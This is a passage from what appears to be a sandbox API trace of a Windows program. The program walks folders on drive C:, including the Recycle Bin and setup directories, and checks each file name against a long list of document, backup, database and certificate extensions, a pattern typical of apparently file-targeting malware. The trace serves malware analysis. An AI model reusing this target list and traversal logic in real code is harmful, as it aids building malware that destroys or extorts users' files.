lpString2="7.log") returned -1 [0195.755] lstrlenW (lpString=".asp") returned 4 [0195.755] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".aspx") returned 5 [0195.755] lstrcmpiW (lpString1=".aspx", lpString2="7.log") returned -1 [0195.755] lstrlenW (lpString=".asr") returned 4 [0195.755] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".asx") returned 4 [0195.756] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".avi") returned 4 [0195.756] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".avs") returned 4 [0195.756] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".backup") returned 7 [0195.756] lstrcmpiW (lpString1=".backup", lpString2="737.log") returned -1 [0195.756] lstrlenW (lpString=".bak") returned 4 [0195.756] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".bay") returned 4 [0195.756] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".bd") returned 3 [0195.756] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0195.756] lstrlenW (lpString=".bin") returned 4 [0195.756] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".bmp") returned 4 [0195.756] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".bz2") returned 4 [0195.756] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".c") returned 2 [0195.756] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0195.756] lstrlenW (lpString=".cdr") returned 4 [0195.756] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".cer") returned 4 [0195.756] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0195.756] lstrlenW (lpString=".cf") returned 3 [0195.756] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0195.756] lstrlenW (lpString=".cfc") returned 4 [0195.756] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".cfm") returned 4 [0195.757] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".cfml") returned 5 [0195.757] lstrcmpiW (lpString1=".cfml", lpString2="7.log") returned -1 [0195.757] lstrlenW (lpString=".cfu") returned 4 [0195.757] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".chm") returned 4 [0195.757] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".cin") returned 4 [0195.757] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".class") returned 6 [0195.757] lstrcmpiW (lpString1=".class", lpString2="37.log") returned -1 [0195.757] lstrlenW (lpString=".clx") returned 4 [0195.757] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".config") returned 7 [0195.757] lstrcmpiW (lpString1=".config", lpString2="737.log") returned -1 [0195.757] lstrlenW (lpString=".cpp") returned 4 [0195.757] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".cr2") returned 4 [0195.757] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".crt") returned 4 [0195.757] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".crw") returned 4 [0195.757] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".cs") returned 3 [0195.757] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0195.757] lstrlenW (lpString=".css") returned 4 [0195.757] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0195.757] lstrlenW (lpString=".csv") returned 4 [0195.757] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".cub") returned 4 [0195.758] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dae") returned 4 [0195.758] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dat") returned 4 [0195.758] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".db") returned 3 [0195.758] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0195.758] lstrlenW (lpString=".dbf") returned 4 [0195.758] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dbx") returned 4 [0195.758] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dc3") returned 4 [0195.758] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dcm") returned 4 [0195.758] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dcr") returned 4 [0195.758] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".der") returned 4 [0195.758] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dib") returned 4 [0195.758] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dic") returned 4 [0195.758] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".dif") returned 4 [0195.758] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0195.758] lstrlenW (lpString=".divx") returned 5 [0195.758] lstrcmpiW (lpString1=".divx", lpString2="7.log") returned -1 [0195.758] lstrlenW (lpString=".djvu") returned 5 [0195.759] lstrcmpiW (lpString1=".djvu", lpString2="7.log") returned -1 [0195.759] lstrlenW (lpString=".dng") returned 4 [0195.759] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0195.759] lstrlenW (lpString=".doc") returned 4 [0195.759] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0195.759] lstrlenW (lpString=".docm") returned 5 [0195.759] lstrcmpiW (lpString1=".docm", lpString2="7.log") returned -1 [0195.759] lstrlenW (lpString=".docx") returned 5 [0195.759] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0195.759] lstrlenW (lpString=".dot") returned 4 [0195.759] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0195.759] lstrlenW (lpString=".dotm") returned 5 [0195.759] lstrcmpiW (lpString1=".dotm", lpString2="7.log") returned -1 [0195.759] lstrlenW (lpString=".dotx") returned 5 [0195.759] lstrcmpiW (lpString1=".dotx", lpString2="7.log") returned -1 [0195.759] lstrlenW (lpString=".dpx") returned 4 [0195.759] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0195.759] lstrlenW (lpString=".dqy") returned 4 [0195.759] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0195.759] lstrlenW (lpString=".dsn") returned 4 [0195.759] lstrcmpiW (lpString1=".dsn", lpString2=".log") returned -1 [0195.759] lstrlenW (lpString=".dt") returned 3 [0195.759] lstrcmpiW (lpString1=".dt", lpString2="log") returned -1 [0195.759] lstrlenW (lpString=".dtd") returned 4 [0195.759] lstrcmpiW (lpString1=".dtd", lpString2=".log") returned -1 [0195.759] lstrlenW (lpString=".dwg") returned 4 [0195.759] lstrcmpiW (lpString1=".dwg", lpString2=".log") returned -1 [0195.759] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0195.760] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0195.760] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0195.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.761] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0195.761] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043f8 [0195.792] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.793] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0195.793] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0195.794] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0195.794] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0195.794] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0195.794] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0195.794] FindClose (in: hFindFile=0x6043f8 | out: hFindFile=0x6043f8) returned 1 [0195.800] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.800] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0195.800] FindClose (in: hFindFile=0x6042f8 | out: hFindFile=0x6042f8) returned 1 [0195.800] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f51228 | out: hHeap=0x5e0000) returned 1 [0195.800] FindNextFileW (in: hFindFile=0x6042b8, lpFindFileData=0x369fcf8 | out: lpFindFileData=0x369fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0195.800] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x6047f8 [0195.801] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0195.801] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0195.801] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6048f8 [0195.801] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.801] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0195.801] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0195.801] FindClose (in: hFindFile=0x6048f8 | out: hFindFile=0x6048f8) returned 1 [0195.801] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.801] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0195.801] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6048f8 [0195.802] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.802] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0195.802] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0195.802] FindClose (in: hFindFile=0x6048f8 | out: hFindFile=0x6048f8) returned 1 [0195.802] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.802] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0195.802] FindClose (in: hFindFile=0x6047f8 | out: hFindFile=0x6047f8) returned 1 [0195.802] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f51228 | out: hHeap=0x5e0000) returned 1 [0195.802] FindNextFileW (in: hFindFile=0x6042b8, lpFindFileData=0x369fcf8 | out: lpFindFileData=0x369fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0195.802] FindNextFileW (in: hFindFile=0x6042b8, lpFindFileData=0x369fcf8 | out: lpFindFileData=0x369fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0195.802] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x6048f8 [0195.803] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0195.809] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1025", cAlternateFileName="")) returned 1 [0195.809] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604238 [0195.809] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, 